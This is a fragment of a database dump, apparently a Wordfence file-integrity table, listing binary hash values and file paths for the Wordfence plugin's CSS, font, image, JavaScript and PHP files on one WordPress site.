z_-?(YpEyƹA','',0,'?'),('\\7Qo','wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|%;wQ8@','wi>6Ƭ4.NC\Z4IO','',0,'?'),('vO#JN+쁁','wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$2J','/#?TiOLyvuTKɤ\\ػ','',0,'?'),('Bjj;Ég','wp-content/plugins/wordfence/css/iptraf.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/iptraf.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ebf.\nV[xPh','J-@ ] - cqWQ $8','',0,'?'),('yvFU^<\\','wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')ef#`P~7n','-mznNFE\0ѭ\\vqsL?Z\Z','',0,'?'),('vX.G%˯','wp-content/plugins/wordfence/css/jquery-ui.min.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/jquery-ui.min.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}O^0tGGQ','ٍ$ rb=phxK5]8QRjn4','',0,'?'),('5W\Zbh;/9r:','wp-content/plugins/wordfence/css/jquery-ui.structure.min.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/jquery-ui.structure.min.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#/h<U','ni 뗅NvX7Y]D','',0,'?'),('.oпQ\nצ5','wp-content/plugins/wordfence/css/jquery-ui.theme.min.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/jquery-ui.theme.min.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bK0bxљ]','4\ncE2=V{+\\goЅO','',0,'?'),('@\0Xuvk<','wp-content/plugins/wordfence/css/license/care-global.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/care-global.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kK.ǴU^','2Ʋv{\"S=^!W:C,OJe:9','',0,'?'),('D٥|','wp-content/plugins/wordfence/css/license/care.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/care.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q )**vv#h','Fr:r(n~3wd9RO','',0,'?'),('wzdeltf7','wp-content/plugins/wordfence/css/license/free-global.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/free-global.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ijgEB7 q,','\\R1\"`l 2LLcXeEt BM|','',0,'?'),('Dϟ$1ls7','wp-content/plugins/wordfence/css/license/free.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/free.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cMos|v','z5񣫍ҤZu| *vs,\0BA9','',0,'?'),('.5Lf{N-','wp-content/plugins/wordfence/css/license/premium-global.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/premium-global.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','٬5&]U\0','=:I#_A\\R֣XFSOrec','',0,'?'),('&Q+ё z','wp-content/plugins/wordfence/css/license/premium.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/premium.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z +DqKҍU','җdUAEqm:,*ɕ','',0,'?'),('V1HP9)','wp-content/plugins/wordfence/css/license/response-global.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/response-global.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}#!+hNi@','V[\'yyX?yeV{FeCl%','',0,'?'),('4iF%D\'','wp-content/plugins/wordfence/css/license/response-variables.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/response-variables.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('n\rhd&k@','wp-content/plugins/wordfence/css/license/response.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/license/response.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V7iixW C','\'= Ұ\0̀> P5a d','',0,'?'),('o!T ]bgY@$ʾ','wp-content/plugins/wordfence/css/main.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/main.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0zmr^@ iK,\\','W_*ŒuA!%\rLmXІObM','',0,'?'),('8$44 ܭPZH','wp-content/plugins/wordfence/css/phpinfo.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/phpinfo.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Q!0w/蓴','a@|I\r=\Z^εd)[W','',0,'?'),('ϗ2tDUf5c','wp-content/plugins/wordfence/css/wf-adminbar.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/wf-adminbar.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԧ_SZډ˴&nQW','ܭ3[=[]|Djga,X n-H{o','',0,'?'),('5ґ98{\'','wp-content/plugins/wordfence/css/wf-colorbox.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/wf-colorbox.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PX)p!N8j ','ot0\rP2NiKu','',0,'?'),('xPq\ZSU?','wp-content/plugins/wordfence/css/wf-font-awesome.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/wf-font-awesome.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'MًV:','997dIOu-%enԻ1I','',0,'?'),('fq5\rGɍk','wp-content/plugins/wordfence/css/wf-global.1695657196.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/css/wf-global.1695657196.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0\n','uʸ!4N2','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',;L\'dee','+GT}m)*[c5ZN-v>','',0,'?'),('m{@m','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oLFʒ4i--','Cc#1_|Z  1ɾYx','',0,'?'),('ӕ\n t0','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mpGaBNX>(','%-*Ψ6Fi\rWϹM׽WI:vD','',0,'?'),('и+:3XnNtexX','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{W7h>',' 2mw3)zWg v{AfHu`Co','',0,'?'),('G:Z]Y!tI\"','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jI78{r P','UkZM=OEwDw |I;','',0,'?'),(']K{ٯ`{,','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+EYHɶ{T8o','',0,'?'),('J=R\'t^}\n','wp-content/plugins/wordfence/images/2fa2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/2fa2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0H','npʅG06K qJ]J','',0,'?'),('様7^b\"','wp-content/plugins/wordfence/images/back_disabled.jpg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/back_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hgi>','䏛N7g΋?Fb!}ݿC鳇','',0,'?'),('׮Fps4','wp-content/plugins/wordfence/images/back_enabled.jpg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/back_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']H','9퇥)R$px#q {#LO','',0,'?'),('n\n\0܁-i','wp-content/plugins/wordfence/images/blocking.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/blocking.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'-Hf< 1','A5Y9\0OtqЖL\\}a&','',0,'?'),('^yG=ڜFg;3á','wp-content/plugins/wordfence/images/button-grad-grey.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/button-grad-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RCTy?','DH~ϨP_{!','',0,'?'),('N7A\0nnV֑','wp-content/plugins/wordfence/images/checkbox.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/checkbox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"G\r6|􈘀\'','y~`w(j~=뤼&ݴQ>`^x','',0,'?'),('oYڅX','wp-content/plugins/wordfence/images/flags.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/flags.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W7 (˿!\Z7','Bx0%Ly6!X\\z/O&ȕJR݇e}(m','',0,'?'),('\0hKf\0','wp-content/plugins/wordfence/images/forward_enabled.jpg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/forward_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\0/3e4e ','0Q7018ު9-z9ؽqSrĒP','',0,'?'),('窒u\rZJW+','wp-content/plugins/wordfence/images/help.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/help.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$N;\'M Y','\Z7\0r€/iz;ki,=LZg','',0,'?'),('٘\"Pܞ,','wp-content/plugins/wordfence/images/icons/ajax24.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/ajax24.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:m𙗣P','j*edoX~7&N9|L','',0,'?'),('\' oS','wp-content/plugins/wordfence/images/icons/ajax3.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/ajax3.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mwߴtꍓ\'\ns','dz\nyKƮ\'#]x VJR.=:','',0,'?'),('y&aA7]Dm','wp-content/plugins/wordfence/images/icons/ajaxRed16.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/ajaxRed16.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%B\ng2;','D,AJlOSpe؇&','',0,'?'),('4=','wp-content/plugins/wordfence/images/icons/ajaxScan.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/ajaxScan.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʖѴ~fi','ߩ0ԍѦƻH\n¡;','',0,'?'),('j&V164','wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r9 #{','ᄆnѿ0c~NrAug~ΔI','',0,'?'),('(x*J,LÛnr4 ','',0,'?'),('\\m]I{B]','wp-content/plugins/wordfence/images/icons/check-premium.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/check-premium.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߇`ީ:\rN','&y$fDz9ͧ|VqV','',0,'?'),('cڮq\".|0>','wp-content/plugins/wordfence/images/icons/check-response.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/check-response.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NF','82f)o>5iq)e=G}','',0,'?'),('ta;_Y\np=[_:B','wp-content/plugins/wordfence/images/icons/check.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/check.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DFPL','+ʣфȯ?+\0_ŴQq','',0,'?'),(']* J ','wp-content/plugins/wordfence/images/icons/email_go.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/email_go.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jEH ).','& qC1QU_.O31!&۴','',0,'?'),('`%{+','wp-content/plugins/wordfence/images/icons/error128.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/error128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':%7!.','{h\0,]zkV{җ6nG\nxs9','',0,'?'),('z5*\ZADZCkj','wp-content/plugins/wordfence/images/icons/magnifier.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/magnifier.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uO{:qcV\'',' atvdQ0(IjƖO$e(*','',0,'?'),('Ρ~ߓ:eo','wp-content/plugins/wordfence/images/icons/tick128.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/tick128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ğch 4\"',' V}X e~G[C峆5','',0,'?'),(';`$r$=','wp-content/plugins/wordfence/images/icons/warning128.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/warning128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pGIt*Np=','*/ȾstA}.b\'\\','',0,'?'),('u64E~:','wp-content/plugins/wordfence/images/icons/working-indicator.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/icons/working-indicator.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VF{N \'G','fXRZ|:Ob=f[y 5 ~ ','',0,'?'),('X@%1 Ci','wp-content/plugins/wordfence/images/lightbox-controls.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m]a\\$','Ǘh?S):i@h.Xg','',0,'?'),('?z6aDz','wp-content/plugins/wordfence/images/loading.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:m𙗣P','j*edoX~7&N9|L','',0,'?'),('Kj h','wp-content/plugins/wordfence/images/loading_background.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'2p\nKX','Ύ%XŖF1s;Lzr璻','',0,'?'),('リQ)B\n,','wp-content/plugins/wordfence/images/loading_large.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/loading_large.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y{ObUW~Y˙','p8\' t:Qo]{5G1E','',0,'?'),('s♼{DR[k1I','wp-content/plugins/wordfence/images/logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zFހW \rl~6','V{Q9V J Xqڀc','',0,'?'),('D8-¤rl','wp-content/plugins/wordfence/images/logos/shield-care.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/logos/shield-care.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' sh߉\0tv','f2\"(>lH93  C$<','',0,'?'),('[A0b[BG','wp-content/plugins/wordfence/images/logos/shield-free.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/logos/shield-free.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m3k#^\Z\Z+W','Lmd1a ףM\\m(#p^1M','',0,'?'),('ۑ݀m9l^H','wp-content/plugins/wordfence/images/logos/shield-premium.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/logos/shield-premium.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r-ȭ\nQV','?mUL-lZOI,XSM׭ޝ-','',0,'?'),('Ӡ_Q?#','wp-content/plugins/wordfence/images/logos/shield-response.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/logos/shield-response.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_\nو1:/(d%܅','\ZjtYaW=x![4H!|','',0,'?'),('d]&3N=','wp-content/plugins/wordfence/images/logos/shield-white.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/logos/shield-white.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dX#pRð J','LO\'(EqHl@)O','',0,'?'),('z^}¤hh3\rw','wp-content/plugins/wordfence/images/options.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/options.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VѴA','D:bw#^4BKIP? znV_','',0,'?'),('xD.m~<2','wp-content/plugins/wordfence/images/ratelimiting.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/ratelimiting.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0[MɞyP','@ Sy\'N+kB3J!PbƖ','',0,'?'),('QoH*(','wp-content/plugins/wordfence/images/sort_asc.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_asc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',I+ƾ=','dCTe&,)ѴFG\ZdON','',0,'?'),('57N C=-c','wp-content/plugins/wordfence/images/sort_asc.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_asc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&DKzS§0','NQ*TZ%P%jܑtZn/','',0,'?'),('lXwB*XW','wp-content/plugins/wordfence/images/sort_asc_disabled.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_asc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oɧ*X9e','v\Z|5.YX Z鹁Ź','',0,'?'),('x_,[5','wp-content/plugins/wordfence/images/sort_asc_disabled.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_asc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǐ#a]2','[8lYckl u#KV n','',0,'?'),('?Yvq_ۮXO','wp-content/plugins/wordfence/images/sort_both.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_both.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','% BQxSV.D','6\"@Xg\'W7wgJq','',0,'?'),(' 7f `','wp-content/plugins/wordfence/images/sort_both.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_both.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dm 8f|Y','~%ۉ%>BlouI)ȉ7g','',0,'?'),('7c. $P!\"򹚆','wp-content/plugins/wordfence/images/sort_desc.gif','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/images/sort_desc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q& ','',0,'?'),('wMb@\"3*u','wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89\"zzVv*]','ۆ%%l:JfFPx','wp-content/plugins/wordfence/js/wfdropdown.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/wfdropdown.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J_Y\ZTvFu\Z','AĺKba4-t$WTrPd','',0,'?'),('(#Na9`K9','wp-content/plugins/wordfence/js/wfglobal.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/wfglobal.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƃ+j/#\n>#z','Nv5o [ )Nvk!m G','',0,'?'),('Er, >9\ZIa','wp-content/plugins/wordfence/js/wfi18n.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/wfi18n.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i&XDEp/N','GU *kP,:?+}xHb5#','',0,'?'),(';zpϗe','wp-content/plugins/wordfence/js/wfonboarding.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/wfonboarding.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r\0c ','6kP+4ˢSwQee','',0,'?'),('N_T/W','wp-content/plugins/wordfence/js/wfpopover.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/wfpopover.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R:RF_CFR','lݛ92̋!f/Ř!RGO8','',0,'?'),('cꓗN%8ӭ','wp-content/plugins/wordfence/js/wfselect2.min.1695657196.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/js/wfselect2.min.1695657196.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ġ ǧ^t,g',' uV nhCPH]8 *)G`.r','',0,'?'),('Rq vz\rPU','wp-content/plugins/wordfence/languages/wordfence.mo','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/languages/wordfence.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ya:`LO','lÍ\\dC=ԗ/w(=GNFѡ{(Cc*','',0,'?'),('UmD3%x','wp-content/plugins/wordfence/languages/wordfence.pot','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/languages/wordfence.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')N)L|m','׏R$l-[,Yf(F^|(H\0G','',0,'?'),('R1?YVDt','wp-content/plugins/wordfence/lib/.htaccess','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\"xK{8dS','C\'r9@Kކtw#@k','',0,'?'),('\'FEAvQMv','wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\r5]xVI\'i','G݅\'! YE3P5adM','',0,'?'),('y 1-/fIנ','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','09\rɘad P','F*OОq^lgz,I?bR]KֳE','',0,'?'),('-n$.# g%}','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' O ّCHؖs ','pXuc{-K׏ژ/OnE0)JB','',0,'?'),('`c0\\3','wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' > U6ƪgvf','R&sX$6#_νJ|b0o','',0,'?'),('ۖJBwC|Mv','wp-content/plugins/wordfence/lib/Diff.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5VzY]#yRJݮ','YM\"z)tϖ*cwL\01w$d','',0,'?'),('Ը%\ZDyZ','wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';u;YlzxC}','Nܓ#dtB!\"M՞==@o','',0,'?'),('\Z;5(OOR','wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǛlmD!','\'9\r9\0o|\Z|0K','',0,'?'),('zvo:B%','wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ih%u-C\0','\"Y¤&6HU^\'$=_;> ','',0,'?'),('\rҗr׾ \n\Z','wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$@ޯ ]&','7aP\\T\"SzJ&bٸ®D','',0,'?'),('$o1T2]l','wp-content/plugins/wordfence/lib/dashboard/widget_countries.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/dashboard/widget_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' d*W1g','+q~;fE_#]IV\\k?lÝϞ','',0,'?'),('Ws{NhPr㼱','wp-content/plugins/wordfence/lib/dashboard/widget_ips.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/dashboard/widget_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w964\"ky','X\"v-*3','',0,'?'),('e؟v笪Ej','wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' UwYII}','ݠ\rڗUDPTV+6^:2!','',0,'?'),('L.\nw;[','wp-content/plugins/wordfence/lib/dashboard/widget_logins.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/dashboard/widget_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' E 4mY>`','#_[Ѹ @uHa(+j>V\Z+q[V','',0,'?'),('u;Ȍ0qw= ','wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1 A׶$^>','p}:\\O1Q6XyTY','',0,'?'),('k6*H 